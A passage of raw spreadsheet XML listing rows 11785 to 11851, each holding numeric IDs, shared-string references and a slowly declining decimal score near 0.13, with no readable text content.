    <row r="11785" ht="15.75" customHeight="1">
      <c r="A11785" s="1">
        <v>30970.0</v>
      </c>
      <c r="B11785" s="2">
        <v>4.7481604E7</v>
      </c>
      <c r="C11785" s="2" t="s">
        <v>11314</v>
      </c>
      <c r="D11785" s="2">
        <v>1.0</v>
      </c>
      <c r="E11785" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11785" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11786" ht="15.75" customHeight="1">
      <c r="A11786" s="1">
        <v>31128.0</v>
      </c>
      <c r="B11786" s="2">
        <v>4889467.0</v>
      </c>
      <c r="C11786" s="2" t="s">
        <v>11315</v>
      </c>
      <c r="D11786" s="2">
        <v>1.0</v>
      </c>
      <c r="E11786" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11786" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11787" ht="15.75" customHeight="1">
      <c r="A11787" s="1">
        <v>18851.0</v>
      </c>
      <c r="B11787" s="2">
        <v>5.3981727E7</v>
      </c>
      <c r="C11787" s="2" t="s">
        <v>11316</v>
      </c>
      <c r="D11787" s="2">
        <v>1.0</v>
      </c>
      <c r="E11787" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11787" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="11788" ht="15.75" customHeight="1">
      <c r="A11788" s="1">
        <v>29208.0</v>
      </c>
      <c r="B11788" s="2">
        <v>3.0778497E7</v>
      </c>
      <c r="C11788" s="2" t="s">
        <v>11317</v>
      </c>
      <c r="D11788" s="2">
        <v>1.0</v>
      </c>
      <c r="E11788" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11788" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="11789" ht="15.75" customHeight="1">
      <c r="A11789" s="1">
        <v>8122.0</v>
      </c>
      <c r="B11789" s="2">
        <v>5.3080065E7</v>
      </c>
      <c r="C11789" s="2" t="s">
        <v>11318</v>
      </c>
      <c r="D11789" s="2">
        <v>1.0</v>
      </c>
      <c r="E11789" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11789" s="2">
        <v>0.1301824212271974</v>
      </c>
    </row>
    <row r="11790" ht="15.75" customHeight="1">
      <c r="A11790" s="1">
        <v>31096.0</v>
      </c>
      <c r="B11790" s="2">
        <v>4.8505825E7</v>
      </c>
      <c r="C11790" s="2" t="s">
        <v>11319</v>
      </c>
      <c r="D11790" s="2">
        <v>1.0</v>
      </c>
      <c r="E11790" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11790" s="2">
        <v>0.1301824212271974</v>
      </c>
    </row>
    <row r="11791" ht="15.75" customHeight="1">
      <c r="A11791" s="1">
        <v>7683.0</v>
      </c>
      <c r="B11791" s="2">
        <v>5.1935501E7</v>
      </c>
      <c r="C11791" s="2" t="s">
        <v>11320</v>
      </c>
      <c r="D11791" s="2">
        <v>1.0</v>
      </c>
      <c r="E11791" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11791" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="11792" ht="15.75" customHeight="1">
      <c r="A11792" s="1">
        <v>33082.0</v>
      </c>
      <c r="B11792" s="2">
        <v>6929390.0</v>
      </c>
      <c r="C11792" s="2" t="s">
        <v>11321</v>
      </c>
      <c r="D11792" s="2">
        <v>1.0</v>
      </c>
      <c r="E11792" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11792" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="11793" ht="15.75" customHeight="1">
      <c r="A11793" s="1">
        <v>14374.0</v>
      </c>
      <c r="B11793" s="2">
        <v>3.8987033E7</v>
      </c>
      <c r="C11793" s="2" t="s">
        <v>11322</v>
      </c>
      <c r="D11793" s="2">
        <v>1.0</v>
      </c>
      <c r="E11793" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11793" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="11794" ht="15.75" customHeight="1">
      <c r="A11794" s="1">
        <v>16863.0</v>
      </c>
      <c r="B11794" s="2">
        <v>4.7948337E7</v>
      </c>
      <c r="C11794" s="2" t="s">
        <v>11323</v>
      </c>
      <c r="D11794" s="2">
        <v>1.0</v>
      </c>
      <c r="E11794" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11794" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="11795" ht="15.75" customHeight="1">
      <c r="A11795" s="1">
        <v>25600.0</v>
      </c>
      <c r="B11795" s="2">
        <v>1.4395079E7</v>
      </c>
      <c r="C11795" s="2" t="s">
        <v>11324</v>
      </c>
      <c r="D11795" s="2">
        <v>1.0</v>
      </c>
      <c r="E11795" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11795" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="11796" ht="15.75" customHeight="1">
      <c r="A11796" s="1">
        <v>28640.0</v>
      </c>
      <c r="B11796" s="2">
        <v>2.7304328E7</v>
      </c>
      <c r="C11796" s="2" t="s">
        <v>11325</v>
      </c>
      <c r="D11796" s="2">
        <v>1.0</v>
      </c>
      <c r="E11796" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11796" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="11797" ht="15.75" customHeight="1">
      <c r="A11797" s="1">
        <v>33887.0</v>
      </c>
      <c r="B11797" s="2">
        <v>9173246.0</v>
      </c>
      <c r="C11797" s="2" t="s">
        <v>11326</v>
      </c>
      <c r="D11797" s="2">
        <v>1.0</v>
      </c>
      <c r="E11797" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11797" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="11798" ht="15.75" customHeight="1">
      <c r="A11798" s="1">
        <v>5295.0</v>
      </c>
      <c r="B11798" s="2">
        <v>4.5219527E7</v>
      </c>
      <c r="C11798" s="2" t="s">
        <v>11327</v>
      </c>
      <c r="D11798" s="2">
        <v>1.0</v>
      </c>
      <c r="E11798" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11798" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="11799" ht="15.75" customHeight="1">
      <c r="A11799" s="1">
        <v>8702.0</v>
      </c>
      <c r="B11799" s="2">
        <v>5.4433702E7</v>
      </c>
      <c r="C11799" s="2" t="s">
        <v>11328</v>
      </c>
      <c r="D11799" s="2">
        <v>1.0</v>
      </c>
      <c r="E11799" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11799" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="11800" ht="15.75" customHeight="1">
      <c r="A11800" s="1">
        <v>16219.0</v>
      </c>
      <c r="B11800" s="2">
        <v>4.5707392E7</v>
      </c>
      <c r="C11800" s="2" t="s">
        <v>11329</v>
      </c>
      <c r="D11800" s="2">
        <v>1.0</v>
      </c>
      <c r="E11800" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11800" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="11801" ht="15.75" customHeight="1">
      <c r="A11801" s="1">
        <v>16817.0</v>
      </c>
      <c r="B11801" s="2">
        <v>4.7836312E7</v>
      </c>
      <c r="C11801" s="2" t="s">
        <v>11330</v>
      </c>
      <c r="D11801" s="2">
        <v>1.0</v>
      </c>
      <c r="E11801" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11801" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="11802" ht="15.75" customHeight="1">
      <c r="A11802" s="1">
        <v>19612.0</v>
      </c>
      <c r="B11802" s="2">
        <v>5.6203388E7</v>
      </c>
      <c r="C11802" s="2" t="s">
        <v>11331</v>
      </c>
      <c r="D11802" s="2">
        <v>1.0</v>
      </c>
      <c r="E11802" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11802" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="11803" ht="15.75" customHeight="1">
      <c r="A11803" s="1">
        <v>20860.0</v>
      </c>
      <c r="B11803" s="2">
        <v>1.5843299E7</v>
      </c>
      <c r="C11803" s="2" t="s">
        <v>11332</v>
      </c>
      <c r="D11803" s="2">
        <v>1.0</v>
      </c>
      <c r="E11803" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11803" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="11804" ht="15.75" customHeight="1">
      <c r="A11804" s="1">
        <v>25002.0</v>
      </c>
      <c r="B11804" s="2">
        <v>1.2721521E7</v>
      </c>
      <c r="C11804" s="2" t="s">
        <v>11333</v>
      </c>
      <c r="D11804" s="2">
        <v>1.0</v>
      </c>
      <c r="E11804" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11804" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="11805" ht="15.75" customHeight="1">
      <c r="A11805" s="1">
        <v>28473.0</v>
      </c>
      <c r="B11805" s="2">
        <v>2.6615476E7</v>
      </c>
      <c r="C11805" s="2" t="s">
        <v>11334</v>
      </c>
      <c r="D11805" s="2">
        <v>1.0</v>
      </c>
      <c r="E11805" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11805" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="11806" ht="15.75" customHeight="1">
      <c r="A11806" s="1">
        <v>29637.0</v>
      </c>
      <c r="B11806" s="2">
        <v>3.3783749E7</v>
      </c>
      <c r="C11806" s="2" t="s">
        <v>11335</v>
      </c>
      <c r="D11806" s="2">
        <v>1.0</v>
      </c>
      <c r="E11806" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11806" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="11807" ht="15.75" customHeight="1">
      <c r="A11807" s="1">
        <v>3209.0</v>
      </c>
      <c r="B11807" s="2">
        <v>3.7284101E7</v>
      </c>
      <c r="C11807" s="2" t="s">
        <v>11336</v>
      </c>
      <c r="D11807" s="2">
        <v>1.0</v>
      </c>
      <c r="E11807" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11807" s="2">
        <v>0.1296296296296296</v>
      </c>
    </row>
    <row r="11808" ht="15.75" customHeight="1">
      <c r="A11808" s="1">
        <v>17311.0</v>
      </c>
      <c r="B11808" s="2">
        <v>4.9314818E7</v>
      </c>
      <c r="C11808" s="2" t="s">
        <v>11337</v>
      </c>
      <c r="D11808" s="2">
        <v>1.0</v>
      </c>
      <c r="E11808" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11808" s="2">
        <v>0.1293402777777778</v>
      </c>
    </row>
    <row r="11809" ht="15.75" customHeight="1">
      <c r="A11809" s="1">
        <v>19661.0</v>
      </c>
      <c r="B11809" s="2">
        <v>5.636528E7</v>
      </c>
      <c r="C11809" s="2" t="s">
        <v>11338</v>
      </c>
      <c r="D11809" s="2">
        <v>1.0</v>
      </c>
      <c r="E11809" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11809" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="11810" ht="15.75" customHeight="1">
      <c r="A11810" s="1">
        <v>20828.0</v>
      </c>
      <c r="B11810" s="2">
        <v>1.5460168E7</v>
      </c>
      <c r="C11810" s="2" t="s">
        <v>11339</v>
      </c>
      <c r="D11810" s="2">
        <v>1.0</v>
      </c>
      <c r="E11810" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11810" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="11811" ht="15.75" customHeight="1">
      <c r="A11811" s="1">
        <v>4734.0</v>
      </c>
      <c r="B11811" s="2">
        <v>4.3324453E7</v>
      </c>
      <c r="C11811" s="2" t="s">
        <v>11340</v>
      </c>
      <c r="D11811" s="2">
        <v>1.0</v>
      </c>
      <c r="E11811" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11811" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="11812" ht="15.75" customHeight="1">
      <c r="A11812" s="1">
        <v>7908.0</v>
      </c>
      <c r="B11812" s="2">
        <v>5.2484636E7</v>
      </c>
      <c r="C11812" s="2" t="s">
        <v>11341</v>
      </c>
      <c r="D11812" s="2">
        <v>1.0</v>
      </c>
      <c r="E11812" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11812" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="11813" ht="15.75" customHeight="1">
      <c r="A11813" s="1">
        <v>9588.0</v>
      </c>
      <c r="B11813" s="2">
        <v>5.6099482E7</v>
      </c>
      <c r="C11813" s="2" t="s">
        <v>11342</v>
      </c>
      <c r="D11813" s="2">
        <v>1.0</v>
      </c>
      <c r="E11813" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11813" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="11814" ht="15.75" customHeight="1">
      <c r="A11814" s="1">
        <v>28108.0</v>
      </c>
      <c r="B11814" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C11814" s="2" t="s">
        <v>11343</v>
      </c>
      <c r="D11814" s="2">
        <v>1.0</v>
      </c>
      <c r="E11814" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11814" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="11815" ht="15.75" customHeight="1">
      <c r="A11815" s="1">
        <v>8465.0</v>
      </c>
      <c r="B11815" s="2">
        <v>5.4011026E7</v>
      </c>
      <c r="C11815" s="2" t="s">
        <v>11344</v>
      </c>
      <c r="D11815" s="2">
        <v>1.0</v>
      </c>
      <c r="E11815" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11815" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="11816" ht="15.75" customHeight="1">
      <c r="A11816" s="1">
        <v>11940.0</v>
      </c>
      <c r="B11816" s="2">
        <v>2.55007E7</v>
      </c>
      <c r="C11816" s="2" t="s">
        <v>11345</v>
      </c>
      <c r="D11816" s="2">
        <v>1.0</v>
      </c>
      <c r="E11816" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11816" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="11817" ht="15.75" customHeight="1">
      <c r="A11817" s="1">
        <v>15350.0</v>
      </c>
      <c r="B11817" s="2">
        <v>4.2642642E7</v>
      </c>
      <c r="C11817" s="2" t="s">
        <v>11346</v>
      </c>
      <c r="D11817" s="2">
        <v>1.0</v>
      </c>
      <c r="E11817" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11817" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="11818" ht="15.75" customHeight="1">
      <c r="A11818" s="1">
        <v>18453.0</v>
      </c>
      <c r="B11818" s="2">
        <v>5.2792672E7</v>
      </c>
      <c r="C11818" s="2" t="s">
        <v>11347</v>
      </c>
      <c r="D11818" s="2">
        <v>1.0</v>
      </c>
      <c r="E11818" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11818" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="11819" ht="15.75" customHeight="1">
      <c r="A11819" s="1">
        <v>24869.0</v>
      </c>
      <c r="B11819" s="2">
        <v>1.2208325E7</v>
      </c>
      <c r="C11819" s="2" t="s">
        <v>11348</v>
      </c>
      <c r="D11819" s="2">
        <v>1.0</v>
      </c>
      <c r="E11819" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11819" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="11820" ht="15.75" customHeight="1">
      <c r="A11820" s="1">
        <v>29710.0</v>
      </c>
      <c r="B11820" s="2">
        <v>3.4377877E7</v>
      </c>
      <c r="C11820" s="2" t="s">
        <v>11349</v>
      </c>
      <c r="D11820" s="2">
        <v>1.0</v>
      </c>
      <c r="E11820" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11820" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="11821" ht="15.75" customHeight="1">
      <c r="A11821" s="1">
        <v>5654.0</v>
      </c>
      <c r="B11821" s="2">
        <v>4.6287046E7</v>
      </c>
      <c r="C11821" s="2" t="s">
        <v>11350</v>
      </c>
      <c r="D11821" s="2">
        <v>1.0</v>
      </c>
      <c r="E11821" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11821" s="2">
        <v>0.1285240464344942</v>
      </c>
    </row>
    <row r="11822" ht="15.75" customHeight="1">
      <c r="A11822" s="1">
        <v>2995.0</v>
      </c>
      <c r="B11822" s="2">
        <v>3.6272307E7</v>
      </c>
      <c r="C11822" s="2" t="s">
        <v>11351</v>
      </c>
      <c r="D11822" s="2">
        <v>1.0</v>
      </c>
      <c r="E11822" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11822" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="11823" ht="15.75" customHeight="1">
      <c r="A11823" s="1">
        <v>17168.0</v>
      </c>
      <c r="B11823" s="2">
        <v>4.8890225E7</v>
      </c>
      <c r="C11823" s="2" t="s">
        <v>11352</v>
      </c>
      <c r="D11823" s="2">
        <v>1.0</v>
      </c>
      <c r="E11823" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11823" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="11824" ht="15.75" customHeight="1">
      <c r="A11824" s="1">
        <v>15341.0</v>
      </c>
      <c r="B11824" s="2">
        <v>4.2614387E7</v>
      </c>
      <c r="C11824" s="2" t="s">
        <v>11353</v>
      </c>
      <c r="D11824" s="2">
        <v>1.0</v>
      </c>
      <c r="E11824" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11824" s="2">
        <v>0.1282828282828283</v>
      </c>
    </row>
    <row r="11825" ht="15.75" customHeight="1">
      <c r="A11825" s="1">
        <v>16546.0</v>
      </c>
      <c r="B11825" s="2">
        <v>4.6803127E7</v>
      </c>
      <c r="C11825" s="2" t="s">
        <v>11354</v>
      </c>
      <c r="D11825" s="2">
        <v>1.0</v>
      </c>
      <c r="E11825" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11825" s="2">
        <v>0.1282828282828283</v>
      </c>
    </row>
    <row r="11826" ht="15.75" customHeight="1">
      <c r="A11826" s="1">
        <v>18867.0</v>
      </c>
      <c r="B11826" s="2">
        <v>5.4035558E7</v>
      </c>
      <c r="C11826" s="2" t="s">
        <v>11355</v>
      </c>
      <c r="D11826" s="2">
        <v>1.0</v>
      </c>
      <c r="E11826" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11826" s="2">
        <v>0.1282828282828283</v>
      </c>
    </row>
    <row r="11827" ht="15.75" customHeight="1">
      <c r="A11827" s="1">
        <v>33037.0</v>
      </c>
      <c r="B11827" s="2">
        <v>6730583.0</v>
      </c>
      <c r="C11827" s="2" t="s">
        <v>11356</v>
      </c>
      <c r="D11827" s="2">
        <v>1.0</v>
      </c>
      <c r="E11827" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11827" s="2">
        <v>0.1282828282828283</v>
      </c>
    </row>
    <row r="11828" ht="15.75" customHeight="1">
      <c r="A11828" s="1">
        <v>2615.0</v>
      </c>
      <c r="B11828" s="2">
        <v>3.4472335E7</v>
      </c>
      <c r="C11828" s="2" t="s">
        <v>11357</v>
      </c>
      <c r="D11828" s="2">
        <v>1.0</v>
      </c>
      <c r="E11828" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11828" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11829" ht="15.75" customHeight="1">
      <c r="A11829" s="1">
        <v>4680.0</v>
      </c>
      <c r="B11829" s="2">
        <v>4.3184224E7</v>
      </c>
      <c r="C11829" s="2" t="s">
        <v>11358</v>
      </c>
      <c r="D11829" s="2">
        <v>1.0</v>
      </c>
      <c r="E11829" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11829" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11830" ht="15.75" customHeight="1">
      <c r="A11830" s="1">
        <v>6718.0</v>
      </c>
      <c r="B11830" s="2">
        <v>4.9279575E7</v>
      </c>
      <c r="C11830" s="2" t="s">
        <v>11359</v>
      </c>
      <c r="D11830" s="2">
        <v>1.0</v>
      </c>
      <c r="E11830" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11830" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11831" ht="15.75" customHeight="1">
      <c r="A11831" s="1">
        <v>6806.0</v>
      </c>
      <c r="B11831" s="2">
        <v>4.9525029E7</v>
      </c>
      <c r="C11831" s="2" t="s">
        <v>11360</v>
      </c>
      <c r="D11831" s="2">
        <v>1.0</v>
      </c>
      <c r="E11831" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11831" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11832" ht="15.75" customHeight="1">
      <c r="A11832" s="1">
        <v>7001.0</v>
      </c>
      <c r="B11832" s="2">
        <v>5.0077526E7</v>
      </c>
      <c r="C11832" s="2" t="s">
        <v>11283</v>
      </c>
      <c r="D11832" s="2">
        <v>1.0</v>
      </c>
      <c r="E11832" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11832" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11833" ht="15.75" customHeight="1">
      <c r="A11833" s="1">
        <v>7040.0</v>
      </c>
      <c r="B11833" s="2">
        <v>5.0142387E7</v>
      </c>
      <c r="C11833" s="2" t="s">
        <v>11283</v>
      </c>
      <c r="D11833" s="2">
        <v>1.0</v>
      </c>
      <c r="E11833" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11833" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11834" ht="15.75" customHeight="1">
      <c r="A11834" s="1">
        <v>10192.0</v>
      </c>
      <c r="B11834" s="2">
        <v>5.7391813E7</v>
      </c>
      <c r="C11834" s="2" t="s">
        <v>11361</v>
      </c>
      <c r="D11834" s="2">
        <v>1.0</v>
      </c>
      <c r="E11834" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11834" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11835" ht="15.75" customHeight="1">
      <c r="A11835" s="1">
        <v>13798.0</v>
      </c>
      <c r="B11835" s="2">
        <v>3.661766E7</v>
      </c>
      <c r="C11835" s="2" t="s">
        <v>11362</v>
      </c>
      <c r="D11835" s="2">
        <v>1.0</v>
      </c>
      <c r="E11835" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11835" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11836" ht="15.75" customHeight="1">
      <c r="A11836" s="1">
        <v>17735.0</v>
      </c>
      <c r="B11836" s="2">
        <v>5.0672959E7</v>
      </c>
      <c r="C11836" s="2" t="s">
        <v>11363</v>
      </c>
      <c r="D11836" s="2">
        <v>1.0</v>
      </c>
      <c r="E11836" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11836" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11837" ht="15.75" customHeight="1">
      <c r="A11837" s="1">
        <v>19659.0</v>
      </c>
      <c r="B11837" s="2">
        <v>5.636528E7</v>
      </c>
      <c r="C11837" s="2" t="s">
        <v>11364</v>
      </c>
      <c r="D11837" s="2">
        <v>1.0</v>
      </c>
      <c r="E11837" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11837" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11838" ht="15.75" customHeight="1">
      <c r="A11838" s="1">
        <v>20269.0</v>
      </c>
      <c r="B11838" s="2">
        <v>1.1090925E7</v>
      </c>
      <c r="C11838" s="2" t="s">
        <v>11365</v>
      </c>
      <c r="D11838" s="2">
        <v>1.0</v>
      </c>
      <c r="E11838" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11838" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11839" ht="15.75" customHeight="1">
      <c r="A11839" s="1">
        <v>21806.0</v>
      </c>
      <c r="B11839" s="2">
        <v>2.6756546E7</v>
      </c>
      <c r="C11839" s="2" t="s">
        <v>11312</v>
      </c>
      <c r="D11839" s="2">
        <v>1.0</v>
      </c>
      <c r="E11839" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11839" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11840" ht="15.75" customHeight="1">
      <c r="A11840" s="1">
        <v>22700.0</v>
      </c>
      <c r="B11840" s="2">
        <v>4.2531298E7</v>
      </c>
      <c r="C11840" s="2" t="s">
        <v>11366</v>
      </c>
      <c r="D11840" s="2">
        <v>1.0</v>
      </c>
      <c r="E11840" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11840" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11841" ht="15.75" customHeight="1">
      <c r="A11841" s="1">
        <v>25052.0</v>
      </c>
      <c r="B11841" s="2">
        <v>1.2866302E7</v>
      </c>
      <c r="C11841" s="2" t="s">
        <v>11367</v>
      </c>
      <c r="D11841" s="2">
        <v>1.0</v>
      </c>
      <c r="E11841" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11841" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11842" ht="15.75" customHeight="1">
      <c r="A11842" s="1">
        <v>26596.0</v>
      </c>
      <c r="B11842" s="2">
        <v>1.7971392E7</v>
      </c>
      <c r="C11842" s="2" t="s">
        <v>11368</v>
      </c>
      <c r="D11842" s="2">
        <v>1.0</v>
      </c>
      <c r="E11842" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11842" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11843" ht="15.75" customHeight="1">
      <c r="A11843" s="1">
        <v>29960.0</v>
      </c>
      <c r="B11843" s="2">
        <v>3607701.0</v>
      </c>
      <c r="C11843" s="2" t="s">
        <v>11369</v>
      </c>
      <c r="D11843" s="2">
        <v>1.0</v>
      </c>
      <c r="E11843" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11843" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="11844" ht="15.75" customHeight="1">
      <c r="A11844" s="1">
        <v>32604.0</v>
      </c>
      <c r="B11844" s="2">
        <v>5820485.0</v>
      </c>
      <c r="C11844" s="2" t="s">
        <v>11370</v>
      </c>
      <c r="D11844" s="2">
        <v>1.0</v>
      </c>
      <c r="E11844" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11844" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="11845" ht="15.75" customHeight="1">
      <c r="A11845" s="1">
        <v>2268.0</v>
      </c>
      <c r="B11845" s="2">
        <v>3.2489813E7</v>
      </c>
      <c r="C11845" s="2" t="s">
        <v>11371</v>
      </c>
      <c r="D11845" s="2">
        <v>1.0</v>
      </c>
      <c r="E11845" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11845" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11846" ht="15.75" customHeight="1">
      <c r="A11846" s="1">
        <v>2827.0</v>
      </c>
      <c r="B11846" s="2">
        <v>3.5395837E7</v>
      </c>
      <c r="C11846" s="2" t="s">
        <v>11372</v>
      </c>
      <c r="D11846" s="2">
        <v>1.0</v>
      </c>
      <c r="E11846" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11846" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11847" ht="15.75" customHeight="1">
      <c r="A11847" s="1">
        <v>3352.0</v>
      </c>
      <c r="B11847" s="2">
        <v>3.7792924E7</v>
      </c>
      <c r="C11847" s="2" t="s">
        <v>11373</v>
      </c>
      <c r="D11847" s="2">
        <v>1.0</v>
      </c>
      <c r="E11847" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11847" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11848" ht="15.75" customHeight="1">
      <c r="A11848" s="1">
        <v>3601.0</v>
      </c>
      <c r="B11848" s="2">
        <v>3.9089675E7</v>
      </c>
      <c r="C11848" s="2" t="s">
        <v>11374</v>
      </c>
      <c r="D11848" s="2">
        <v>1.0</v>
      </c>
      <c r="E11848" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11848" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11849" ht="15.75" customHeight="1">
      <c r="A11849" s="1">
        <v>3676.0</v>
      </c>
      <c r="B11849" s="2">
        <v>3.9447251E7</v>
      </c>
      <c r="C11849" s="2" t="s">
        <v>11375</v>
      </c>
      <c r="D11849" s="2">
        <v>1.0</v>
      </c>
      <c r="E11849" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11849" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11850" ht="15.75" customHeight="1">
      <c r="A11850" s="1">
        <v>4564.0</v>
      </c>
      <c r="B11850" s="2">
        <v>4.2726323E7</v>
      </c>
      <c r="C11850" s="2" t="s">
        <v>11376</v>
      </c>
      <c r="D11850" s="2">
        <v>1.0</v>
      </c>
      <c r="E11850" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11850" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11851" ht="15.75" customHeight="1">
      <c r="A11851" s="1">
        <v>4639.0</v>
      </c>
      <c r="B11851" s="2">
        <v>4.3026133E7</v>
      </c>
      <c r="C11851" s="2" t="s">
        <v>11377</v>
      </c>
      <c r="D11851" s="2">
        <v>1.0</v>
      </c>
      <c r="E11851" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11851" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
